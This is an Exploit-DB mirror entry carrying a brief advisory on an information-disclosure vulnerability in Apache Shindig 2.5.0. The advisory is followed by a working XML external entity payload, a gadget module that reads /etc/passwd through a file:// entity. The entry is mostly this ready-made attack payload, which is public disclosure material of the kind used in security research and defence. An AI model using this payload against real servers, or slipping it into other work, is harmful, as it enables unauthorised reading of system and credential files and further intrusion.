exploit-db-mirror/exploits/multiple/remote/38813.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

12 lines
No EOL
534 B
Text

source: https://www.securityfocus.com/bid/63260/info
Apache Shindig is prone to an information-disclosure vulnerability.
An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.
Apache Shindig 2.5.0 is vulnerable.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <Module>
<ModulePrefs title="Test Application"> <Require feature="opensocial-0.9" />
</ModulePrefs> <Content type="html"> &passwd; hello </Content> </Module>